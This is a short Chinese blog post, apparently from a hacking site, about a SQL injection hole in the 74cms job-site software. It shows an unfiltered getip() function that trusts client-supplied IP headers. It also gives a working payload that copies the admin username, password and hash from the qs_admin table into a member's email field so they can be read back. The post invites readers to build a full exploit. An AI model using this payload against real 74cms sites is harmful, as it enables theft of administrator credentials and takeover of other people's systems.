74cms sql注入漏洞
function getip()
{
if(getenv('HTTP_CLIENT_IP')){
$onlineip=getenv('HTTP_CLIENT_IP');
}else if(getenv('HTTP_X_FORWARDED_FOR')){
$onlineip=getenv('HTTP_X_FORWARDED_FOR');
}else if(getenv('REMOTE_ADDR')){
$onlineip=getenv('REMOTE_ADDR');
}else{
$onlineip=$_SERVER['REMOTE_ADDR'];
}
return $onlineip;
}
ip没过滤
和子仪牛的这个漏洞很像https://www.webshell.cc/thread-14725-1-1.html。但是
那个漏洞是用来提升权限。。。因为管理和会员在一个表。。。。。74cms的管理和会员不在
一个表我们可以这样注入
$getinj="zyday1.1.', email=(SELECT concat(admin_name,0x2f,pwd,0x2f,pwd_hash ) FROM qs_admin) where username = '$dpusername'#";
就是把查询到的账号密码赋值给email...接着在会员中心查看个人资料就可以爆账号和密码和hash了
大体和子仪牛没什么区别了
以前参考子仪牛的exp写了个exp。。。。但是弄丢了。。。不好意了
有兴趣的同学可以写一下

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1095.html